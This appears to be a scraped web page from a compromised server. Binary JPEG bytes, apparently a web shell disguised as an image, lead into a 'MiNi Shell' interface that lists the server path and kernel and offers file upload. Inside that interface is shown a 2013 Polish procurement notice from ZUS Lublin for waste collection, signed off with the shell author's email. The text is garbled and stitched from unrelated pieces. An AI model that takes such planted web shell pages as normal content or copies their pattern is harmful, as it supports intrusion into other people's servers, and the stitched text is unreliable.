JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130524/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130524/202122-N-2013.html

<p class="kh_header"><b>Lublin: Usługa  wywozu odpadów komunalnych z obiektów Oddziału ZUS w Lublinie
      oraz z podległych Oddziałowi  6. Terenowych Jednostek Organizacyjnych (TJO)</b><br>
<b>Numer ogłoszenia: 202122 - 2013; data zamieszczenia: 24.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Ubezpieczeń Społecznych Oddział w Lublinie , ul. Tomasza Zana 36,38c, 20-601 Lublin, woj. lubelskie, tel. 081 5357402, faks 081 5357402.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zus.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Instytucja ubezpieczenia społecznego i zdrowotnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa  wywozu odpadów komunalnych z obiektów Oddziału ZUS w Lublinie
      oraz z podległych Oddziałowi  6. Terenowych Jednostek Organizacyjnych (TJO).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia, o wartości szacunkowej poniżej 130 000 euro,  jest  usługa wywozu stałych odpadów komunalnych, zwanych dalej  >odpadami< ,
 z obiektów Oddziału ZUS w Lublinie oraz z podległych Oddziałowi 6. Terenowych Jednostek Organizacyjnych (TJO);

2.Przedmiot zamówienia podzielony został na 7. zadań stanowiących odrębne części przedmiotu zamówienia. Zamawiający  dopuszcza możliwość składanie ofert częściowych na dowolną ilość nw. zadań:
2.1.Zadanie I.  Wywóz odpadów z posesji Inspektoratu w Kraśniku przy ul. Ks. J. Popiełuszki 3A z pojemników  dostarczonych przez wykonawcę, w okresie  36 miesięcy od dnia zawarcia umowy ale nie wcześniej niż  od dnia 01.07.2013r.;
2.2. Zadanie II..  Wywóz odpadów z posesji Oddziału ZUS w Lublinie przy ul .T. Zana 36,36A,38B i 38C, z pojemników dostarczonych przez wykonawcę,  w okresie 36  miesięcy od dnia zawarcia umowy ale nie wcześniej niż od dnia 01.07.2013r.;
2.3. Zadanie III.  Wywóz odpadów z posesji Inspektoratu w Lubartowie przy ul. Lipowej 6, z pojemników dostarczonych przez wykonawcę, w okresie 36 miesięcy od dnia zawarcia umowy ale nie wcześniej niż od dnia 01.07.2013r.;
2.4. Zadanie IV.  Wywóz odpadów z posesji Biura Terenowego w Parczewie przy Pl. Wolności 7,  z pojemników dostarczonych przez wykonawcę, w okresie 36 miesięcy od dnia zawarcia umowy ale nie wcześniej niż od dnia 01.07.2013r.;
2.5. Zadanie V. Wywóz odpadów z posesji Inspektoratu w Białej Podlaskiej, ul. Sadowa 23, z pojemników dostarczonych przez wykonawcę  w okresie 36 miesięcy od dnia zawarcia umowy ale nie wcześniej niż od dnia 01.07.2013r.;
2.6. Zadanie VI.  Wywóz  odpadów z posesji Inspektoratu w Puławach przy ul. Lubelskiej 20B, z pojemników dostarczonych przez wykonawcę , w okresie 36 miesięcy od dnia zawarcia umowy ale nie wcześniej niż od dnia 01.07.2013r.;
2.7.Zadanie VII. Wywóz odpadów z posesji Biura Terenowego w Łęcznej ul. Obrońców Pokoju 5, z pojemników dostarczonych przez wykonawcę, w okresie 36 miesięcy od dnia zawarcia umowy ale nie wcześniej niż od dnia 01.07.2013r. 

 Uwaga! Wszystkie postanowienia  ogłoszenia dotyczą każdego zadania, chyba  że treść postanowienia stanowi inaczej;

3. Szczegółowy zakres i warunki realizacji przedmiotu zamówienia opisane są  w Specyfikacji Istotnych Warunków Zamówienia (SIWZ);
 
4. Wykonawca wykona przedmiot zamówienia zgodnie z SIWZ oraz zgodnie z aktualnymi  przepisami prawa  z zakresu przedmiotu zamówienia;
  
5.  WSPÓLNY SŁOWNIK ZAMÓWIEŃ:  Kody CPV:    90.51.10.00 - 2  Usługi wywozy odpadów,   90.51.20.00 - 9  Usługi transportu odpadów,  90.50.00.00 - 2 Usługi związane z odpadami;

6.  Nie przewiduje się zamówień  uzupełniających, o których mowa w art. 67 ust.  1 pkt 6   i 7 lub art. 134 ust. 6 pkt 3 i 4 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych ( Dz. U. z 2010 r. Nr 113, poz. 759 z późn. zm.),  zwanej dalej >ustawą<..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.50.00.00-2, 90.51.20.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>I. Wykonawca spełni ten warunek, jeżeli posiada aktualne zezwolenie na zbieranie i transport odpadów wydane przez właściwy organ zgodnie  z ustawą z dnia 14.12.2012r. o odpadach (Dz.U. z  2013 poz. 21)  oraz  aktualny dokument potwierdzający  wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych  od właścicieli nieruchomości, prowadzonego przez Wójta, Burmistrza lub Prezydenta miasta właściwego ze względu na miejsce odbierania odpadów komunalnych od właścicieli nieruchomości, zgodnie z art. 9c ustawy z dnia 13 .09.1996 r.   o utrzymaniu czystości    i porządku w gminach (D.U. z 2012r. poz.391 ze zm.). 

II. Na potwierdzenie spełnienia tego warunku,  wykonawca złoży wraz zofertą:

 a) aktualne zezwolenie na zbieranie i transport odpadów wydane przez właściwy organ zgodnie z ustawą z dnia 14.12.2012r. o odpadach (Dz.U. z  2013 poz. 21),

b)aktualny dokument potwierdzający  wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości, prowadzonego przez Wójta, Burmistrza lub Prezydenta miasta właściwego ze względu na miejsce odbierania odpadów komunalnych od właścicieli nieruchomości, zgodnie z art. 9c ustawy z dnia 13 .09.1996 r. o utrzymaniu czystości   i porządku w gminach (D.U. z 2012r. poz.391 ze zm.) Wykonawcy odbierający odpady komunalne od właścicieli nieruchomości, którzy  w dniu wejścia w życie ustawy z dnia 1.01.2011r. o zmianie ustawy  o utrzymaniu czystości i porządku w gminach (Dz. U. Nr 152, poz.897 z późn zm.), tj. w dniu 1 stycznia 2012r. posiadali zezwolenie na prowadzenie działalności gospodarczej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości, mogą - zgodnie   z art.14 ust. 1 powołanej ustawy nowelizującej - wykazać spełnienie warunku udziału  w postępowaniu również na podstawie tego zezwolenia;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa  szczczegółowych wymagań w zakresie tego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa  szczczegółowych wymagań w zakresie tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa  szczczegółowych wymagań w zakresie tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>I. Wykonawca spełni ten warunek, jeżeli jest ubezpieczony od odpowiedzialości cywilnej w zakresie prowadzonej działalnosci;

II. Na potwierdzenie spełnienia tego warunku,  wykonawca złoży wraz zofertą
opłaconą polisęa, a w przypadku jej braku, inny dokument  potwierdzający, że wykonawca    lub podmiot trzeci (z którego zasobów korzysta wykonawca) jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Niezależnie od  ww. dokumentów żądanych na ppotwierdzenie spełniania warunków udziału w postepowaniu,   wykonawca zobowiązany jest złożyć wraz zofertą oświadczenie, że spełnia warunki zawarte w art. 22 ust. 1 ustawy (według załącznika  do SIWZ). 

2. Jeżeli  w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się  dokumentów, o których mowa w pkt. III.4.3.1),  zastępuje się je  dokumentem  zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju  miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem - wystawione  nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;

3. W  przypadku oferty wspólnej (np. konsorcjum )
a/ spełnianie warunków  udziału w postępowaniu,  o których mowa   w  pkt. III.3,   będzie oceniane łącznie.
b/  oświadczenie, o którym mowa w pkt. 1 (z art. 22 ust.1 ustawy), składa pełnomocnik wykonawcy;   przy  czym  pełnomocnictwo powinno być dołączone do oferty,
c/ brak podstaw do wykluczenia musi wykazać  każdy ze składających ofertę wspólną  poprzez  złożenie wraz z  ofertą dokumentów, o których mowa w pkt. III.4.2);

4. Jeżeli wykonawca nie spełnia samodzielnie warunków udziału w postępowaniu   a  wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach  innych podmiotów na zasadach określonych w art. 26 ust.2b ustawy, zobowiązany jest udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia,   w szczególności załączając do oferty pisemne zobowiązanie tych podmiotów (oryginał)  do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich  przy wykonywaniu zamówienia. 
   Ponadto Zamawiający żąda dokumentów potwierdzających w szczególności zakres dostępnych wykonawcy zasobów innego podmiotu, sposób wykorzystania zasobów innego podmiotu przy wykonywaniu zamówienia oraz charakter stosunku, jaki będzie łaczył wykonawcę z innym podmiotem.
            W przypadku polegania na zasobach innych podmiotów, spełnianie warunków  udziału   w postępowaniu,  o których mowa   w pkt. III.3,   będzie oceniane łącznie (wykonawca i inny podmiot).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>opisane w SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zus.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego, ZUS Oddział    w Lublinie, 20-601 Lublin,  ul. T. Zana 38C , piętro IX,  pokój   nr 914 - budynek  38C.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.06.2013 godzina 12:00, miejsce: Oferty należy składać w siedzibie Zamawiającego, piętro IV, pok. Nr 406 - budynek  przy  ul. T. Zana 38C (sekretariat)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. SIWZ  zamieszczona będzie na stronie internetowej  Zamawiającego: www.zus.pl od dnia zamieszczenia  ogłoszenia   w Biuletynie Zamówień Publicznych (ogłoszenie będzie opublikowane w dniu  24.05.2013r.  na portalu UZP)  do upływu terminu składania ofert;

2.SIWZ w wersji papierowej  (bezpłatna)  można odebrać  osobiście   w siedzibie Zamawiającego, ZUS Oddział    w Lublinie, 20-601 Lublin,  ul. T. Zana 38C , piętro IX,  pokój   nr 914 - budynek  38C  lub otrzymać  pocztą;

3.  Pracownikami  uprawnionymi  do kontaktów z wykonawcami  są:  Włodzimierz Koczkodaj  tel/fax: (81) 535-77-94 oraz Marzena Bogdańska -   tel/fax: (81) 535-77-24  w godz. 07:15 -15:15;

4.  Otwarcie ofert nastąpi w dniu 04.06.2013r. o godzinie 12:30 w siedzibie   Zamawiającego, piętro  IV,  sala nr 414 - budynek  przy ul T. Zana 36;

5. Termin związania ofertą - 30 dni od daty składania ofert -  bieg terminu związania  ofertą rozpoczyna się wraz z upływem terminu składania ofert;

6.   Zamawiający nie przewiduje zawarcia umowy ramowej;

7. Ustanawianie dynamicznego systemu zakupów - nie dotyczy niniejszego zamówienia;

8. Zamawiający nie przewiduje udzielania zaliczek na poczet wykonania zamówienia, o których mowa   w art. 151a ustawy;

9.  Zamawiający nie przewiduje wymagań związanych z realizacją zamówienia (o których mowa w art. 29 ust. 4 ustawy), tj. dotyczących zatrudnienia osób bezrobotnych i młodocianych w celu przygotowania zawodowego, niepełnosprawnych i innych ,  o których mowa w przepisach o zatrudnieniu socjalnym lub we właściwych przepisach państw członkowskich Unii Europejskiej lub Europejskiego Obszaru Gospodarczego;

10. Zamawiający ustala faksową formę przekazywania informacji,  oświadczeń, wniosków, zawiadomień  (nr faksu: 81 535-77-94); przy czym każda ze stron, na żądanie drugiej, potwierdzi niezwłocznie fakt otrzymania korespondencji. W przypadku braku możliwości komunikacji faksowej  dopuszcza się formę elektroniczną (koczkodajw@zus.pl). Niezależnie od powyższego ustalenia zawsze dopuszczalna jest forma pisemna    ( w szczególności forma ta dotyczy oferty    i dokumentów składanych jako uzupełnienie oferty na wezwanie zamawiającego) z zastrzeżeniem wyjątków przewidzianych w ustawie.  W zakresie  określonym ustawą, Zamawiający będzie zamieszczał  dokumenty i informacje dotyczące niniejszego postępowania  na stronie internetowej   www.zus.pl.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com